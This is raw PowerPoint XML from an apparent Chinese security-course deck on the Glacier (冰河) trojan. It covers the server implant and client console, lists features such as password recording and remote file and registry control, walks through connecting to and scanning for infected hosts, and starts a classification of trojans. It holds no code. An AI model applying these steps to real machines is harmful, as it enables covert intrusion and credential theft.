            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包括两个可运行的程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>G_Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>G_Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，其中前者是木马的服务器端，就是用来植入目标主机的程序，后者是木马的客户端，也就是木马的控制台。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2874677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115718">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="115718">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115718">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115718">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115718">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="115718">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115718">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115718">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115718">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="115718">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115718">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1157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8" grpId="0" uiExpand="1" build="p"/>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41" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冰河客户端界面 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="116742" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000125" y="1127125"/>
            <a:ext cx="7200900" cy="5035550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322829703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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冰河的主要功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117766" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="1343025"/>
            <a:ext cx="7416800" cy="4497388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>自动跟踪目标机屏幕变化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>局域网适用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>完全模拟键盘及鼠标输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>局域网适用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>记录各种口令信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>获取系统信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>限制系统功能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>远程文件操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>注册表操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>发送信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>点对点通讯</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17219228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3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冰河的使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119814" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479425" y="1538288"/>
            <a:ext cx="3724275" cy="4297362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器端运行后，可以在控制台上进行连接。单击工具栏上的快捷按钮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>添加主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，弹出如图所示的对话框，输入远程主机的相关信息即可。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="119815" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4357688" y="1528763"/>
            <a:ext cx="4427537" cy="3897312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26262426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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>冰河的使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>连接成功后的信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120838" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179388" y="1711325"/>
            <a:ext cx="2305050" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接成功后，则会显示远程主机上的信息如硬盘盘符等，如图所示。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="120839" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2627313" y="1309688"/>
            <a:ext cx="6372225" cy="4776787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8576034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1" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冰河的使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121862" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以上直接连接是一种方法，冰河还可以自动搜索已经中了冰河木马的主机，只需要简单的设置即可。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3619506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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="122886" name="Picture 5" descr="8_00"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1133475" y="1238250"/>
            <a:ext cx="7345363" cy="4968875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159766452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9" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>10.0.13.19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="123910" name="Picture 4" descr="8_01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="954088" y="1223963"/>
            <a:ext cx="7343775" cy="5014912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424747443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3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冰河的使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>续</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124934" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10.0.13.19</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中安装了木马服务器后，就可对这台计算机进行操作了。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>冰河的功能非常强大，它有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件管理器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令控制台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>两个选项卡。点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件管理器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以管理被入侵的电脑的硬盘。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296057339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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件管理器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125958" name="Picture 4" descr="8_1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="885825" y="1216025"/>
            <a:ext cx="7489825" cy="5078413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412291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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20486" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658484" y="1435592"/>
            <a:ext cx="7489825" cy="5018087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马所实现的功能角度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>可分为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>破坏型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>密码发送型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程访问型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
